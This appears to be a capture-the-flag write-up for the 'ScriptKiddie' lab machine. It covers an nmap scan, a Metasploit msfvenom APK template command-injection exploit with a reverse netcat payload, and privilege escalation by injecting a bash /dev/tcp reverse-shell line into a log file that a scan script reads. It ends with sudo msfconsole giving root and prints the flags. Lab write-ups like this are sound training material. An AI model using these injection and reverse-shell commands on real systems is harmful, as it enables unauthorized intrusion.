I start off with an nmap scan:
└─# nmap -sC -sV -A 10.10.10.226
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5

I visit http://10.10.10.226:5000/ and see different options to try for exploits like Command Injection, RFI, LFI, File Upload Vulnerability.
On metasploit : msf6 > search template
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > options
Module options (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection):
  Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.apk          yes       The APK file name

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.2       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit

[+] msf.apk stored at /root/.msf4/local/msf.apk

I then proceed to upload the msf.apk on the site and wait for a callback on port 4444.
kid@scriptkiddie:~$ cat user.txt
cat user.txt
9ba7544134ef7c067d406b84b791d48b
==================Priv Escalation=====================
kid@scriptkiddie:~/logs$ ls
ls
hackers
kid@scriptkiddie:~/logs$ ls -al
ls -al
total 12
drwxrwxrwx  2 kid kid 4096 May 22 03:56 .
drwxr-xr-x 11 kid kid 4096 May 22 02:53 ..
-rwxrwxr-x  1 kid pwn   57 May 22 03:55 hackers
=======================
kid@scriptkiddie:~/logs$ cat /home/pwn/scanlosers.sh
cat /home/pwn/scanlosers.sh
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
=================
Payload like : echo " HRI ; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.6/4242 0>&1' &" >> hackers
pwn@scriptkiddie:~$ id
id
uid=1001(pwn) gid=1001(pwn) groups=1001(pwn)
pwn@scriptkiddie:~$ whoami
whoami
pwn
pwn@scriptkiddie:~$ ls
ls
recon
scanlosers.sh
pwn@scriptkiddie:~$ pwd
pwd
/home/pwn
pwn@scriptkiddie:~$ sudo -l
sudo -l
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
pwn@scriptkiddie:~$ sudo /opt/metasploit-framework-6.0.9/msfconsole
sudo /opt/metasploit-framework-6.0.9/msfconsole
                                                  
msf6 > ls
[*] exec: ls
recon
scanlosers.sh
msf6 > cd /root
msf6 > whoami
[*] exec: whoami
root
stty: 'standard input': Inappropriate ioctl for device
msf6 > ls
[*] exec: ls
root.txt
msf6 > cat root.txt
[*] exec: cat root.txt

ee650aec2cdfbf78f70a32e39629cf0e
